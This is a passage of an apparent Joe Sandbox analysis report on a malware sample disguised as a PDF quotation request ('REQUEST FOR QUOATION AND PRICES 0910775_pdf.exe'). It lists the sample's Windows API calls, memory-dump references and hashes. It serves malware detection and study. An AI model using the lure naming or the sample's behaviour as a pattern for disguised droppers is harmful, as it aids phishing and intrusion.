                                                                                                                                  • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                  • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                  • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                                                  • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                  • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                  • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                                  • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                  • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                                  • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                                                  • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                                  • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                                  • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                                                  • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                                  • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                  • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                  • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                                  • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                  • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                    • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                  • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                  • CloseClipboard.USER32 ref: 00405676
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                  • String ID: {
                                                                                                                                  • API String ID: 590372296-366298937
                                                                                                                                  • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                                  • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                                  • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                                  • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                  • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                    • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                    • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                    • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                    • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                    • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                                                  • API String ID: 2624150263-2957766633
                                                                                                                                  • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                                  • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                                  • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                                  • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                                  • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                                                  • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                                  • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                  • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                                                  • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                  • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                                  • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                  • String ID: -B@$Call$N$open
                                                                                                                                  • API String ID: 3615053054-1446803726
                                                                                                                                  • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                  • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                  • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                  • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                  • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
